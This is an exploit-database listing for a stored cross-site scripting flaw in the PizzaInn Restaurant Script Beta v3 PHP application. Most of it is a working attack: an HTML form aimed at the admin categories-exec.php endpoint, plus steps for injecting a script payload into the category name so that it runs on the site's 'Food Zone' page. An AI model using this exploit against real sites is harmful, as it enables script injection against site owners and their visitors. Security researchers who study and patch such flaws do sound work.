[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PizzaInn Beta 3 Cross Site Scripting Vulnerability

Author
Nassim Asrir
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-25925
Category
web applications
Date add
20-10-2016
Platform
php
# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (categories-exec.php) - Stored XSS
# Author :------------------------ : Nassim Asrir 
# Author Company :------------------------ : HenceForth
# Author Email :------------------------ : wassline@gmail.com
# Google Dork :---------------- :  -
# Date :-------------------------- : 20/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- :  PHP  
# Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html
 
   
############################ Stored XSS Vulnerabilty ############################
       
## Exploit ##

<html>
<title>CSRF Exploit By Nassim Asrir</title>
<CAPTION><h3>ADD A NEW CATEGORY</h3></CAPTION>
<form name="categoryForm" id="categoryForm" action="http://Site/script/admin/categories-exec.php" method="post" onsubmit="return categoriesValidate(this)">
<tr>
    <th>Name</th>
    
</tr>
<tr>
    <td><input type="text" name="name" class="textfield" /></td>
    <td><input type="submit" name="Submit" value="Add" /></td>
</tr>
</form>
</table>
</html>

## Proc ##

- Create a .html File and Put the Code.

- Navigate the File in your Localhost .

- and in the Textbox inject XSS Payload ("><script>alert(1);</script>) and you redirect to http://site/script/admin/access-denied.php

- and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to home site and navigate "Food Zone" . and you can see the Alert Box.

#  0day.today [2024-10-06]  #